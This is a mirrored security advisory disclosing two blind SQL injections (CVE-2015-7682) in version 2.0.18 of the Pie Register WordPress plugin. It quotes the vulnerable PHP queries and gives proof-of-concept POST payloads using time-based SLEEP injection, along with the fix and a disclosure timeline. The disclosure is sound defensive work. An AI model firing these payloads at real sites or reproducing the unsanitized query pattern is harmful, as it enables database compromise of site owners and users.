Computer Security
[EN] securityvulns.ru no-pyccku


Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 3343-1] twig security update

  CVE-2015-6535: Stored XSS in YouTube Embed (WordPress plugin) allows admins to compromise super admins

  Jenkins 1.626 - Cross Site Request Forgery / Code Execution

  Dogma India dogmaindia CMS - Auth Bypass Vulnerability

From:grajalerts_(at)_gmail.com <grajalerts_(at)_gmail.com>
Date:26.10.2015
Subject:CVE-2015-7682: Multiple Blind SQL Injections in Pie Register WordPress Plugin




Details
================
Software: Pie Register
Version: 2.0.18
Homepage: https://github.com/GTSolutions/Pie-Register
CVE: CVE-2015-7682 (Pending)
CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N)
CWE: CWE-89

Description
================
Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.

Vulnerabilities
================
The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:

Injection 1:
From  pie-register/pie-register.php:
576: $this-
>delete_invitation_codes($_POST['select_invitaion_code_bulk_option'
]);
. . .
3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";

Injection 2:
From pie-register/pie-register.php:
1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))

Proof of concept
================
URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes

Injection 1:
POST data:
select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0
%20LIMIT%201--
&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=
Apply

Injection 2:
POST data:
piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp
-admin%2Fadmin.php%3Fpage%3Dpie-invitation-
codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%
201--

Remediation
================
Upgrade the plugin to version 2.0.19 or higher.

Timeline
================
2015-09-23: Discovered
2015-09-24: Contacted vendor via website support form
2015-09-28: Vendor supplied security contact email
2015-09-28: Requested CVE
2015-09-30: Report sent to vendor and wordpress.org
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed
2015-10-12: Public Disclosure

References
================
[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injec
tion_Attacks


Discovered by
================
David Moore @grajagandev
 

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod